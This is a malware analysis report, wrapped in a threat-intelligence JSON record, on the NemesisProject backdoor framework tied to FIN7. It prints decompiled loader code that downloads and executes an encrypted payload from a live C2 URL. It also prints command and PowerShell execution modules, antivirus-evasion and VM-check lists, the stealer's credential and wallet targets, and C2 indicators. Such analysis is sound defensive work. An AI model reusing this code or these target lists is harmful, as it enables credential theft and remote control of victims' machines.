{
	"id": "b3f32b3a-2291-4fe1-8b48-da81560742da",
	"created_at": "2026-04-06T00:07:05.869846Z",
	"updated_at": "2026-04-10T03:37:09.131604Z",
	"deleted_at": null,
	"sha1_hash": "19c3e75214a9de6ed66964ca8dd50d0f823345cc",
	"title": "NemesisProject",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 121623,
	"plain_text": "NemesisProject\r\nBy Jason Reaves\r\nPublished: 2023-07-31 · Archived: 2026-04-05 18:08:51 UTC\r\nBy: Jason Reaves, Jonathan McCay and Joshua Platt\r\nNemesisProject has recently been seen in use, at least partially, by FIN7[1], where it was delivered through\r\nTirion (aka Lizar, DiceLoader). The project itself comes as a backdoor framework with plugin\r\ncomponents:\r\nBotLoaderStarter\r\nBot Module\r\nCMD Module\r\nPowershell Module\r\nPrintScreen Module\r\nStealer Module\r\nIt appears to be in active development; most of the pieces CI has recovered or looked at have been written in\r\n.NET. The components have functionality to directly load and execute managed assembly code.\r\nTechnical Overview\r\nAs previously mentioned, this framework has a number of components; we will go over each component below.\r\nBotLoaderStarter\r\nThe BotLoaderStarter is, as the name suggests, a loader designed to download and run a file; it comes with\r\nonboard settings (a configuration) for the loader:\r\nnamespace Bot.Settings\r\n{\r\n public static class Setup\r\n {\r\n public static string WebChannelMainUrl1 = \"http://de-signui.]com/api/support\";\r\n public static string WebChannelMainUrl2 = \"\";\r\n public static string WebChannelMainUrl3 = \"\";\r\n public static string OneDriveChannelLogin = \"\";\r\n public static string OneDriveChannelPassword = \"\";\r\n public static string OneDriveChannelUrlPath = \"\";\r\n public static string AzureConnectionString = \"\";\r\nhttps://medium.com/walmartglobaltech/nemesisproject-816ed5c1e8d5\r\nPage 1 of 20\n\npublic static string IsEnableCryptorBot = \"1\";\r\n public static string SeparateWord = \"OEYQBEDEOUNN\";\r\n }\r\n}\r\nThe main functionality, as previously mentioned, is to download and run a file:\r\n private static string botName = \"m_BOT.dll\";\r\n public static void Run()\r\n {\r\n byte[] array = Main.DownloadBot(Setup.WebChannelMainUrl1);\r\n if (array == null \u0026\u0026 
!string.IsNullOrEmpty(Setup.WebChannelMainUrl2))\r\n {\r\n array = Main.DownloadBot(Setup.WebChannelMainUrl2);\r\n }\r\n if (array == null \u0026\u0026 !string.IsNullOrEmpty(Setup.WebChannelMainUrl3))\r\n {\r\n array = Main.DownloadBot(Setup.WebChannelMainUrl3);\r\n }\r\n Main.CheckAndStartBot(array);\r\n }\r\nIn this case the file to be downloaded is called ‘m_BOT.dll’ and will be downloaded over HTTP, you may have\r\nnoticed that there were two other methods of communications available in the config data which was Azure and\r\nOneDrive, but they are not used by this loader.\r\nThe downloaded file is encrypted using RC4 but the key and start of the encrypted data is actually inside the\r\ndownloaded binary:\r\nprivate static void CheckAndStartBot(byte[] data)\r\n {\r\n if (data == null)\r\n {\r\n return;\r\n }\r\n if (Setup.IsEnableCryptorBot == \"1\")\r\n {\r\n string separateWord = Setup.SeparateWord;\r\n byte[] bytes = Encoding.UTF8.GetBytes(separateWord);\r\n List\u003cint\u003e list = Main.IndexOfSequence(data, bytes, 0);\r\n byte[] arg_90_0 = data.Skip(list[0] + bytes.Length).Take(list[1] - list[0] - bytes.Length).ToArra\r\n byte[] data2 = data.Skip(list[1] + bytes.Length).Take(data.Length - list[1] - bytes.Length).ToAr\r\n Main.StartBot(Main.RC4(arg_90_0, data2));\r\n return;\r\n }\r\nhttps://medium.com/walmartglobaltech/nemesisproject-816ed5c1e8d5\r\nPage 2 of 20\n\nMain.StartBot(data);\r\n }\r\n private static void StartBot(byte[] bot)\r\n {\r\n new Thread(delegate\r\n {\r\n Type type = Assembly.Load(bot).GetType(\"Bot.Main\");\r\n type.InvokeMember(\"Run\", BindingFlags.InvokeMethod, null, type, new object[0]);\r\n }).Start();\r\n }\r\nThe loader uses the SeparateWord string from the settings to find the RC4 key and the start of the encrypted data.\r\nPython example:\r\n\u003e\u003e\u003e t2 = data[6144:]\r\n\u003e\u003e\u003e 
t2[:100]\r\nb'LCYEQDQMFUBTJBDXERQTLCYEQDQMFUBTU\\xd6\\x9f\\xec\\x95\\x00dv\\xcb0\\xb4\\x04\\xe9I\\xea\\xccxh72#}\\x05\\xc6J\\x9\r\n\u003e\u003e\u003e len(sep)\r\n12\r\n\u003e\u003e\u003e t2 = t2[12:]\r\n\u003e\u003e\u003e t2[:100]\r\nb'JBDXERQTLCYEQDQMFUBTU\\xd6\\x9f\\xec\\x95\\x00dv\\xcb0\\xb4\\x04\\xe9I\\xea\\xccxh72#}\\x05\\xc6J\\x97F\\xe4\\xeb\\x\r\n\u003e\u003e\u003e t2.find(sep)\r\n8\r\n\u003e\u003e\u003e d = t2[:8]\r\n\u003e\u003e\u003e t2 = t2[8+12:]\r\n\u003e\u003e\u003e t2[:100]\r\nb'U\\xd6\\x9f\\xec\\x95\\x00dv\\xcb0\\xb4\\x04\\xe9I\\xea\\xccxh72#}\\x05\\xc6J\\x97F\\xe4\\xeb\\x80\\xa4\\xc4\\xcb\\n]s\\x\r\n\u003e\u003e\u003e t2.find(sep)\r\n-1\r\n\u003e\u003e\u003e from Crypto.Cipher import ARC4\r\n\u003e\u003e\u003e rc4 = ARC4.new(d)\r\n\u003e\u003e\u003e ttt = rc4.decrypt(t2)\r\n\u003e\u003e\u003e ttt[:100]\r\nb'MZ\\x90\\x00\\x03\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\xff\\xff\\x00\\x00\\xb8\\x00\\x00\\x00\\x00\\x00\\x00\\x00@\\x00\\x00\r\n\u003e\u003e\u003e sep\r\nb'LCYEQDQMFUBT'\r\n\u003e\u003e\u003e d\r\nb'JBDXERQT'\r\nBot\r\nThe bot piece of this framework contains a large amount of encoded strings, even in the additionally included\r\nlibraries. 
The encoding is just a base64 decode followed by a GZIP decompress:\r\nhttps://medium.com/walmartglobaltech/nemesisproject-816ed5c1e8d5\r\nPage 3 of 20\n\ndef decode(a):\r\n t = base64.b64decode(a)\r\n l = struct.unpack_from(‘\u003cI’, t)[0]\r\n if l != 0:\r\n return(zlib.decompress(t[4:],30))\r\n return(t[4:])\r\nUsing the above function, we can quickly enumerate all the decompiled .NET code to enumerate all the encoded\r\nstrings, a quick list of all the decoded strings from the bot code only:\r\nx\r\nAzure\r\nRUNDLL\r\n.txt\r\n.dll\r\nPOST\r\n_cmd\r\nSUCCESS\r\n\"\r\nRun\r\n.jpg\r\n_run\r\nUpload----\r\nfile\r\n_\r\nCMD\r\nPRINTSCREEN\r\n/\r\nSHELLCODE\r\n[^A-Za-z0-9]\r\nx86\r\ndocuments\r\nPOWERSHELL\r\n_scr\r\n/PostFile\r\nbotshare\r\nWeb {0}\r\nhttp://de-signui.com/api/support\r\nx64\r\n_ping\r\n?file=\r\n_ps\r\n_msg\r\nOneDrive\r\nModule.Main\r\nKILL\r\nhttps://medium.com/walmartglobaltech/nemesisproject-816ed5c1e8d5\r\nPage 4 of 20\n\nb_\r\nbdir\r\nm_\r\nLCYEQDQMFUBT\r\napplication/json\r\n_kill\r\n_resp\r\nSTEALER\r\n_stealer\r\napplication/octet-stream\r\nPING\r\n_pong\r\nNONE\r\nERROR\r\n_inject\r\n1\r\nPONG\r\nC2 traffic can be over Web, OneDrive or Azure:\r\n if (!string.IsNullOrEmpty(Setup.WebChannelMainUrl1))\r\n {\r\n this.engineWeb1 = WebChannelWrapper.Engine.GetEngine(BotEngine.botId, Setup.WebChannelMainUrl1, n\r\n }\r\n if (!string.IsNullOrEmpty(Setup.WebChannelMainUrl2))\r\n {\r\n this.engineWeb2 = WebChannelWrapper.Engine.GetEngine(BotEngine.botId, Setup.WebChannelMainUrl2, n\r\n }\r\n if (!string.IsNullOrEmpty(Setup.WebChannelMainUrl3))\r\n {\r\n this.engineWeb3 = WebChannelWrapper.Engine.GetEngine(BotEngine.botId, Setup.WebChannelMainUrl3, n\r\n }\r\n if (!string.IsNullOrEmpty(Setup.OneDriveChannelLogin) \u0026\u0026 !string.IsNullOrEmpty(Setup.OneDriveChann\r\n {\r\n this.engineOneDrive = new OneDriveWrapper.Engine(BotEngine.botId, Setup.OneDriveChannelLogin, Set\r\n }\r\n if (!string.IsNullOrEmpty(Setup.AzureConnectionString))\r\n {\r\n 
this.engineAzure = new AzureWrapper.Engine(BotEngine.botId, Setup.AzureConnectionString, num++);\r\n }\r\nThe OneDrive and Azure modes operate in a similar manner: they create a file either on an Azure tenant or in a\r\nSharePoint folder. The filename is based on bot data, and the file is then checked periodically while waiting for a\r\ncommand or task to run.\r\nCommand functionality:\r\nHeartBeat\r\nTimerTick\r\nPowerShellScriptRun\r\nStealerRun\r\nInjectShellCode\r\nCmdScriptRun\r\nRunModuleWithBodyAndReturnMessage\r\nRunModuleWithBody\r\nPrintScreen\r\nKILL\r\nRunICE\r\nPing\r\nPong\r\nRunDLL\r\nAzure config template:\r\n private string connectionString;\r\n private string shareName = \"botshare\";\r\n private string dirName = \"bdir\";\r\n private string botId;\r\n private string templateResponse;\r\n private string templatePowerShell;\r\n private string templateCmd;\r\n private string templateStealer;\r\n private string templatePrintScreen;\r\n private string templatePrintScreenFile;\r\n private string templatePing;\r\n private string templateRun;\r\n private string templateInjectShellCode;\r\n private string templatePong;\r\n private string templateKill;\r\n private string templateMessage;\r\n private string templateResponseEnd = '_resp';\r\n private string templatePowerShellEnd = '_ps';\r\n private string templateCmdEnd = '_cmd';\r\n private string templateStealerEnd = '_stealer';\r\n private string templatePrintScreenEnd = '_scr';\r\n private string templatePingEnd = '_ping';\r\n private string templatePongEnd = '_pong';\r\n private string templateRunEnd = '_run';\r\n private string templateInjectShellCodeEnd = '_inject';\r\n private string templateKillEnd = '_kill';\r\n private string templateMessageEnd = '_msg';\r\n private string templateStartBot = 'b_';\r\nprivate string templateStartModule = 
'm_';\r\n public bool IsActive\r\nPingPong sends off some bot info when it performs a checkin:\r\n return Json.Serialize(new PingPong(botId)\r\n {\r\n State = state,\r\n Type = type,\r\n FileName = fileName,\r\n OsName = SystemHelper.GetOSInfo(),\r\n Ip = SystemHelper.GetLocalIPAddress(),\r\n AvDetect = SystemHelper.CheckAV(),\r\n Message = message\r\n }, null);\r\nThe CheckAV function looks for a very large amount of AV artifacts:\r\nALYac\r\naylaunch.exe\r\nayupdate2.exe\r\nAYRTSrv.exe\r\nAYAgent.exe\r\nAVG\r\nAVGSvc.exe\r\nAVGUI.exe\r\navgwdsvc.exe\r\navg.exe\r\navgaurd.exe\r\navgemc.exe\r\navgrsx.exe\r\navgserv.exe\r\navgw.exe\r\nAcronis\r\narsm.exe\r\nacronis_license_service.exe\r\nAd-Aware\r\nAdAwareService.exe\r\nAd-Aware.exe\r\nAdAware.exe\r\nAhnLab-V3\r\npatray.exe\r\nV3Svc.exe\r\nArcabit\r\narcavir.exe\r\narcadc.exe\r\nhttps://medium.com/walmartglobaltech/nemesisproject-816ed5c1e8d5\r\nPage 7 of 20\n\nArcaVirMaster.exe\r\nArcaMainSV.exe\r\nArcaTasksService.exe\r\nAvast\r\nashDisp.exe\r\nAvastUI.exe\r\nAvastSvc.exe\r\nAvastBrowser.exe\r\nAfwServ.exe\r\nAvira AntiVirus\r\navcenter.exe\r\navguard.exe\r\navgnt.exe\r\nsched.exe\r\nBaiduSdSvc.exe\r\nBaiduSdTray.exe\r\nBaiduSd.exe\r\nbddownloader.exe\r\nbaiduansvx.exe\r\nBitDefender\r\nBdagent.exe\r\nBitDefenderCom.exe\r\nvsserv.exe\r\nbdredline.exe\r\nbdservicehost.exe\r\nBkav\r\nBKavService.exe\r\nBka.exe\r\nBkavUtil.exe\r\nBLuPro.exe\r\nCAT-QuickHeal\r\nQUHLPSVC.exe\r\nonlinent.exe\r\nsapissvc.exe\r\nscanwscs.exe\r\nCMC\r\nCMCTrayIcon.exe\r\nClamAV\r\nfreshclam.exe\r\nComodo\r\ncpf.exe\r\ncavwp.exe\r\nccavsrv.exe\r\ncmdvirth.exe\r\nCrowdStrike Falcon\r\ncsfalconservice.exe\r\nCSFalconContainer.exe\r\nhttps://medium.com/walmartglobaltech/nemesisproject-816ed5c1e8d5\r\nPage 8 of 
20\n\nCybereason\r\nCybereasonRansomFree.exe\r\nCybereasonRansomFreeServiceHost.exe\r\nCybereasonAV.exe\r\nCylance\r\nCylanceSvc.exe\r\nCyren\r\nvsedsps.exe\r\nvseamps.exe\r\nvseqrts.exe\r\nDrWeb\r\ndrwebcom.exe\r\nspidernt.exe\r\ndrwebscd.exe\r\ndrweb32w.exe\r\ndwengine.exes\r\nESET-NOD32\r\negui.exe\r\necls.exe\r\nekrn.exe\r\neguiProxy.exe\r\nEmsisoft\r\na2cmd.exe\r\na2guard.exe\r\nEndgame\r\nendgame.exe\r\nF-Prot\r\nF-PROT.exe\r\nFProtTray.exe\r\nFPAVServer.exe\r\nf-stopw.exe\r\nf-prot95.exe\r\nf-agnt95.exe\r\nF-Secure\r\nf-secure.exe\r\nfssm32.exe\r\nFsorsp64.exe\r\nfsavgui.exe\r\nfameh32.exe\r\nfch32.exe\r\nfih32.exe\r\nfnrb32.exe\r\nfsav32.exe\r\nfsma32.exe\r\nfsmb32.exe\r\nFireEye\r\nxagtnotif.exe\r\nhttps://medium.com/walmartglobaltech/nemesisproject-816ed5c1e8d5\r\nPage 9 of 20\n\nxagt.exe\r\nFortinet\r\nFortiClient.exe\r\nFortiTray.exe\r\nFortiScand.exe\r\nGData\r\nAVK.exe\r\navkcl.exe\r\navkpop.exe\r\navkservice.exe\r\nIkarus\r\nguardxservice.exe\r\nguardxkickoff.exe\r\nKVFW.exe\r\nKVsrvXP.exe\r\nKVMonXP.exe\r\nKVwsc.exe\r\nK7AntiVirus\r\nK7TSecurity.exe\r\nK7TSMain.Exe\r\nK7TSUpdT.exe\r\nKaspersky\r\navp.exe\r\navpcc.exe\r\navpm.exe\r\nkavpf.exe\r\nKingsoft\r\nkxetray.exe\r\nksafe.exe\r\nKSWebShield.exe\r\nkpfwtray.exe\r\nKWatch.exe\r\nKSafeSvc.exe\r\nKSafeTray.exe\r\nMax Secure Software\r\nSDSystemTray.exe\r\nMaxRCSystemTray.exe\r\nRCSystemTray.exe\r\nMalwarebytes\r\nMalwarebytesPortable.exe\r\nMbae.exe\r\nMBAMIService.exe\r\nmbamdor.exe\r\nMcAfee\r\nMcshield.exe\r\nTbmon.exe\r\nFrameworkservice.exe\r\nhttps://medium.com/walmartglobaltech/nemesisproject-816ed5c1e8d5\r\nPage 10 of 20\n\nfiresvc.exe\r\nfiretray.exe\r\nhipsvc.exe\r\nmfevtps.exe\r\nmcafeefire.exe\r\nshstat.exe\r\nvstskmgr.exe\r\nengineserver.exe\r\nalogserv.exe\r\navconsol.exe\r\ncmgrdian.exe\r\ncpd.exe\r\nmcmnhdlr.exe\r\nmcvsshld.exe\r\nmcvsrte.exe\r\nmghtml.exe\r\nmpfservice.exe\r\nmpfagent.exe\r\nmpftray.exe\r\nvshwin32.exe\r\nvsstat.exe\r\nguarddog.exe\r\nMicrosoft security 
essentials\r\nMsMpEng.exe\r\nmssecess.exe\r\nemet_service.exe\r\ndrwatson.exe\r\nNANO-Antivirus\r\nnanoav.exe\r\nnanoav64.exe\r\nnanoreport.exe\r\nnanoreportc.exe\r\nnanoreportc64.exe\r\nnanorst.exe\r\nnanosvc.exe\r\na-squared free\r\na2guard.exe\r\na2free.exe\r\na2service.exe\r\nPalo Alto Networks\r\nPanInstaller.exe\r\nPanda Security\r\nremupd.exe\r\napvxdwin.exe\r\npavproxy.exe\r\npavsched.exe\r\nQihoo-360\r\nhttps://medium.com/walmartglobaltech/nemesisproject-816ed5c1e8d5\r\nPage 11 of 20\n\n360sd.exe\r\n360tray.exe\r\nZhuDongFangYu.exe\r\n360rp.exe\r\n360safe.exe\r\n360safebox.exe\r\nQHActiveDefense.exe\r\nRising\r\nRavMonD.exe\r\nrfwmain.exe\r\nRsMgrSvc.exe\r\nSUPERAntiSpyware\r\nsuperantispyware.exe\r\nsascore.exe\r\nSAdBlock.exe\r\nsabsvc.exe\r\nSecureAge APEX\r\nUniversalAVService.exe\r\nEverythingServer.exe\r\nclamd.exe\r\nSophos AV\r\nSavProgress.exe\r\nSophosUI.exe\r\nSophosFS.exe\r\nSophosHealth.exe\r\nSophosSafestore64.exe\r\nSophosCleanM.exe\r\nicmon.exe\r\nSymantec\r\nccSetMgr.exe\r\nccapp.exe\r\nvptray.exe\r\nccpxysvc.exe\r\ncfgwiz.exe\r\nsmc.exe\r\nsymproxysvc.exe\r\nvpc32.exe\r\nlsetup.exe\r\nluall.exe\r\nlucomserver.exe\r\nsbserv.exe\r\nTencent\r\nQQPCRTP.exe\r\nQQPCTray.exe\r\nQQPCMgr.exe\r\nTotalDefense\r\nAMRT.exe\r\nhttps://medium.com/walmartglobaltech/nemesisproject-816ed5c1e8d5\r\nPage 12 of 20\n\nSWatcherSrv.exe\r\nPrd.ManagementConsole.exe\r\nTrapmine\r\nTrapmineEnterpriseService.exe\r\nTrapmineEnterpriseConfig.exe\r\nThe list of available modules that the bot can download (can be either 32 or 64 bit):\r\nPRINTSCREEN\r\nCMD\r\nSTEALER\r\nPOWERSHELL\r\nNemesis Stealer\r\nThe stealer component has been previously reported on[1], it is interesting that the stealer comes with its own\r\nconfiguration onboard which would allow it to be used independently. 
In this case the C2 is the same as the\r\nprevious bot piece.\r\nIn terms of functionality, the stealer did not include C2 functionality for Azure or OneDrive but instead operated\r\nover HTTP. It also checks the country of the system it is running on to see if it is one of these countries:\r\nArmenia\r\nAzerbaijan\r\nBelarus\r\nKazakhstan\r\nKyrgyzstan\r\nMoldova\r\nUzbekistan\r\nUkraine\r\nRussia\r\nIt has built-in checks for the following as well:\r\nRDP available\r\nSandBoxie\r\nVirtual check\r\nFor the virtual machine check it will perform WMI queries on Win32_ComputerSystem to check for the following\r\nstrings:\r\nvirtual\r\nvmbox\r\nvmware\r\nvirtualbox\r\nbox\r\nthinapp\r\nVMXh\r\ninnotek gmbh\r\ntpvcgateway\r\ntpautoconnsvc\r\nvbox\r\nkvm\r\nred hat\r\nThe stealer will also attempt to turn off the following registry values:\r\nPromptOnSecureDesktop\r\nConsentPromptBehaviorAdmin\r\nBrowsers are targeted for harvesting logins, bookmarks, cookies, credit cards, autofills and history data. 
The\r\nbrowsers targeted can be split between Chromium based and Gecko based.\r\nChromium based browsers:\r\nGoogle Chrome\r\nOpera Stable\r\nOpera\r\nOpera Neon\r\nCitrio\r\nCoolNovo\r\nAvant Webkit\r\nIridium\r\nYandex\r\nOrbitum\r\nKinza\r\nBrave\r\nAmigo\r\nTorch\r\nComodo Dragon\r\nKometa\r\nVivaldi\r\nNichrome Rambler\r\nEpic Privacy\r\nCocCoc\r\n360Browser\r\nSputnik\r\nUran\r\nCentBrowser\r\n7Star\r\nElements\r\nSuperbird\r\nChedot\r\nSuhba\r\nMustang\r\nEdge\r\nPaths:\r\n\"\\\\Chromium\\\\User Data\\\\\",\r\n\"\\\\Google\\\\Chrome\\\\User Data\\\\\",\r\n\"\\\\Google(x86)\\\\Chrome\\\\User Data\\\\\",\r\n\"\\\\Opera Software\\\\\",\r\n\"\\\\MapleStudio\\\\ChromePlus\\\\User Data\\\\\",\r\n\"\\\\Iridium\\\\User Data\\\\\",\r\n\"\\\\7Star\\\\7Star\\\\User Data\\\\\",\r\n\"\\\\CentBrowser\\\\User Data\\\\\",\r\n\"\\\\Chedot\\\\User Data\\\\\",\r\n\"\\\\Vivaldi\\\\User Data\\\\\",\r\n\"\\\\Kometa\\\\User Data\\\\\",\r\n\"\\\\Elements Browser\\\\User Data\\\\\",\r\n\"\\\\Epic Privacy Browser\\\\User Data\\\\\",\r\n\"\\\\Microsoft\\\\Edge\\\\User Data\\\\\",\r\n\"\\\\uCozMedia\\\\Uran\\\\User Data\\\\\",\r\n\"\\\\Fenrir Inc\\\\Sleipnir5\\\\setting\\\\modules\\\\ChromiumViewer\\\\\",\r\n\"\\\\CatalinaGroup\\\\Citrio\\\\User Data\\\\\",\r\n\"\\\\Coowon\\\\Coowon\\\\User Data\\\\\",\r\n\"\\\\liebao\\\\User Data\\\\\",\r\n\"\\\\QIP Surf\\\\User Data\\\\\",\r\n\"\\\\Orbitum\\\\User Data\\\\\",\r\n\"\\\\Comodo\\\\Dragon\\\\User Data\\\\\",\r\n\"\\\\Amigo\\\\User\\\\User Data\\\\\",\r\n\"\\\\Torch\\\\User Data\\\\\",\r\n\"\\\\Yandex\\\\YandexBrowser\\\\User Data\\\\\",\r\n\"\\\\Comodo\\\\User Data\\\\\",\r\n\"\\\\360Browser\\\\Browser\\\\User Data\\\\\",\r\n\"\\\\Maxthon3\\\\User Data\\\\\",\r\n\"\\\\K-Melon\\\\User 
Data\\\\\",\r\n\"\\\\Sputnik\\\\Sputnik\\\\User Data\\\\\",\r\n\"\\\\Nichrome\\\\User Data\\\\\",\r\n\"\\\\CocCoc\\\\Browser\\\\User Data\\\\\",\r\nhttps://medium.com/walmartglobaltech/nemesisproject-816ed5c1e8d5\r\nPage 15 of 20\n\n\"\\\\Uran\\\\User Data\\\\\",\r\n\"\\\\Chromodo\\\\User Data\\\\\",\r\n\"\\\\Mail.Ru\\\\Atom\\\\User Data\\\\\",\r\n\"\\\\BraveSoftware\\\\Brave-Browser\\\\User Data\\\\\"\r\nGecko Based browsers:\r\nFirefox\r\nMozilla\r\nIceDragon\r\nComodo_Dragon\r\nPale_Moon\r\nWaterfox\r\nThunderbird\r\nCyberfox\r\nNETGATE_BlackHaw\r\nPaths:\r\n\"\\\\Mozilla\\\\Firefox\",\r\n\"\\\\Comodo\\\\IceDragon\",\r\n\"\\\\Mozilla\\\\SeaMonkey\",\r\n\"\\\\Moonchild Productions\\\\Pale Moon\",\r\n\"\\\\Waterfox\",\r\n\"\\\\K-Meleon\",\r\n\"\\\\Thunderbird\",\r\n\"\\\\8pecxstudios\\\\Cyberfox\",\r\n\"\\\\NETGATE Technologies\\\\BlackHaw\"\r\nParses credit card numbers:\r\nAmex Card\r\nBCGlobal\r\nCarte Blanche Card\r\nDiners Club card\r\nDiscover Card\r\nInsta Payment Card\r\nJCB Card\r\nKoreanLocalCard\r\nLaser Card\r\nMaestro Card\r\nMastercard\r\nSolo Card\r\nSwitch Card\r\nhttps://medium.com/walmartglobaltech/nemesisproject-816ed5c1e8d5\r\nPage 16 of 20\n\nUnion Pay Card\r\nVisa Card\r\nVisa Mastercard\r\nExpress Card\r\nApplications targeted:\r\nDynDNS\r\nFileZilla\r\nFoxMail\r\nPidgin\r\nTelegram\r\nDiscord Tokens\r\nSteam local config\r\nSteam profile data\r\nNordVPN\r\nOpenVPN\r\nProtonVPN\r\nCrypto Wallets:\r\nElectrum\r\nElectrum-DASH\r\nEthereum\r\nExodus\r\nAtomic\r\nJaxx\r\nCoinomi\r\nGuarda\r\nArmory\r\nZcash\r\nBytecoin\r\nCrypto Extensions:\r\nMetaMask — nkbihfbeogaeaoehlefnkodbefgpgknn\r\nTronLink — ibnejdfjmmkpcnlpebklmnkoeoihofec\r\nBinance — fhbohimaelbohpjbbldcngcnapndodjp\r\nThe stealer will also attempt to harvest files from the infected system that match a list of extensions, in this case\r\nthe following:\r\n.txt\r\n.doc\r\n.cs\r\nhttps://medium.com/walmartglobaltech/nemesisproject-816ed5c1e8d5\r\nPage 17 of 
20\n\n.html\r\n.htm\r\n.xml\r\n.php\r\n.json\r\n.rdp\r\n.ovpn\r\nCMD Module\r\nThe CMD module is for executing a shell command via cmd.exe and then returning the result.\r\n public static class Main\r\n {\r\n public static string Run(string cmd)\r\n {\r\n Process expr_36 = Process.Start(new ProcessStartInfo(\"cmd.exe\", \"/c \" + cmd)\r\n {\r\n CreateNoWindow = true,\r\n UseShellExecute = false,\r\n RedirectStandardError = true,\r\n RedirectStandardOutput = true\r\n });\r\n expr_36.WaitForExit();\r\n string result = expr_36.StandardOutput.ReadToEnd();\r\n expr_36.StandardError.ReadToEnd();\r\n int arg_5A_0 = expr_36.ExitCode;\r\n expr_36.Close();\r\n return result;\r\n }\r\n }\r\nPOWERSHELL Module\r\nThe PowerShell module is similar to the CMD one except that it detonates a PowerShell command:\r\nnamespace Module\r\n{\r\n public static class Main\r\n {\r\n public static bool Run(string cmd)\r\n {\r\n PowerShell.Create().AddScript(cmd).Invoke();\r\n return true;\r\n }\r\nhttps://medium.com/walmartglobaltech/nemesisproject-816ed5c1e8d5\r\nPage 18 of 20\n\n}\r\n}\r\nPRINTSCREEN Module\r\nThe printscreen module takes a screenshot and returns it:\r\n public static class Main\r\n {\r\n public static byte[] Run()\r\n {\r\n Bitmap bitmap = new Bitmap(Screen.PrimaryScreen.Bounds.Width, Screen.PrimaryScreen.Bounds.Height)\r\n Graphics.FromImage(bitmap).CopyFromScreen(0, 0, 0, 0, bitmap.Size);\r\n MemoryStream memoryStream = new MemoryStream();\r\n bitmap.Save(memoryStream, ImageFormat.Jpeg);\r\n memoryStream.Position = 0L;\r\n return Main.StreamToByteArray(memoryStream);\r\n }\r\nIOCS\r\nWMI commands\r\nSELECT * FROM Win32_ComputerSystem\r\nSELECT * FROM Win32_OperatingSystem\r\n- version\r\n- user\r\n- serialnumber\r\n- computer name\r\n- logical processes\r\n- system direction\r\nSELECT * FROM Win32_Processor\r\n- CPU name\r\n- cpu id\r\nSELECT * FROM Win32_DesktopMonitor\r\n- screen resolution\r\nSELECT * FROM Win32_BIOS\r\n- BIOS version\r\nSELECT * FROM 
AntiVirusProduct\r\n- installed antivirus\r\nSELECT * FROM FirewallProduct\r\n- installed firewall\r\nSELECT TotalPhysicalMemory FROM Win32_ComputerSystem\r\n- TotalPhysicalMemory\r\nSELECT * FROM Win32_PhysicalMemory\r\nhttps://medium.com/walmartglobaltech/nemesisproject-816ed5c1e8d5\r\nPage 19 of 20\n\n- capacity\r\n- memorytype\r\nSELECT * FROM Win32_VideoController\r\n- adapterram\r\nFiles written:\r\nCounter.txt\r\nClip_BoardText.txt\r\nInformation.html\r\nInstalled_Software_Log.txt\r\nProcessInfo_Log.txt\r\nScreenShot.png\r\nUserAgents.txt\r\nPasswords.txt\r\nDynDns_Log.txt\r\nFileZilla_Log.txt\r\nFoxMail_Log.txt\r\nPidgin_Log.txt\r\nlog.txt\r\nVPN/Nord_Log.txt\r\nVPN/ProtonVPN_Log.txt\r\nSteam/SteamID_Log.txt\r\nDiscord/Tokens.txt\r\nMalware C2:\r\nes-megadom.com\r\n194.87.148.85\r\n195.123.245.30\r\n65.108.255.127\r\n213.166.71.155\r\n23.227.193.141\r\nplus-lema.com\r\ndeveparty.com\r\nde-signui.com\r\n91.107.143.20\r\nhelloworld2.watela2425.workers.dev\r\nReferences\r\n1: https://securityintelligence.com/posts/ex-conti-fin7-actors-collaborate-new-backdoor/\r\nSource: https://medium.com/walmartglobaltech/nemesisproject-816ed5c1e8d5\r\nhttps://medium.com/walmartglobaltech/nemesisproject-816ed5c1e8d5\r\nPage 20 of 20",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://medium.com/walmartglobaltech/nemesisproject-816ed5c1e8d5"
	],
	"report_names": [
		"nemesisproject-816ed5c1e8d5"
	],
	"threat_actors": [
		{
			"id": "9de1979b-40fc-44dc-855d-193edda4f3b8",
			"created_at": "2025-08-07T02:03:24.92723Z",
			"updated_at": "2026-04-10T02:00:03.755516Z",
			"deleted_at": null,
			"main_name": "GOLD LOCUST",
			"aliases": [
				"Anunak",
				"Carbanak",
				"Carbon Spider ",
				"FIN7 ",
				"Silicon "
			],
			"source_name": "Secureworks:GOLD LOCUST",
			"tools": [
				"Carbanak"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "0661a292-80f3-420b-9951-a50e03c831c0",
			"created_at": "2023-01-06T13:46:38.928796Z",
			"updated_at": "2026-04-10T02:00:03.148052Z",
			"deleted_at": null,
			"main_name": "IRIDIUM",
			"aliases": [],
			"source_name": "MISPGALAXY:IRIDIUM",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df",
			"created_at": "2023-01-06T13:46:38.402513Z",
			"updated_at": "2026-04-10T02:00:02.959797Z",
			"deleted_at": null,
			"main_name": "Sandworm",
			"aliases": [
				"IRIDIUM",
				"Blue Echidna",
				"VOODOO BEAR",
				"FROZENBARENTS",
				"UAC-0113",
				"Seashell Blizzard",
				"UAC-0082",
				"APT44",
				"Quedagh",
				"TEMP.Noble",
				"IRON VIKING",
				"G0034",
				"ELECTRUM",
				"TeleBots"
			],
			"source_name": "MISPGALAXY:Sandworm",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "bb8702c5-52ac-4359-8409-998a7cc3eeaf",
			"created_at": "2023-01-06T13:46:38.405479Z",
			"updated_at": "2026-04-10T02:00:02.961112Z",
			"deleted_at": null,
			"main_name": "FIN7",
			"aliases": [
				"ATK32",
				"G0046",
				"G0008",
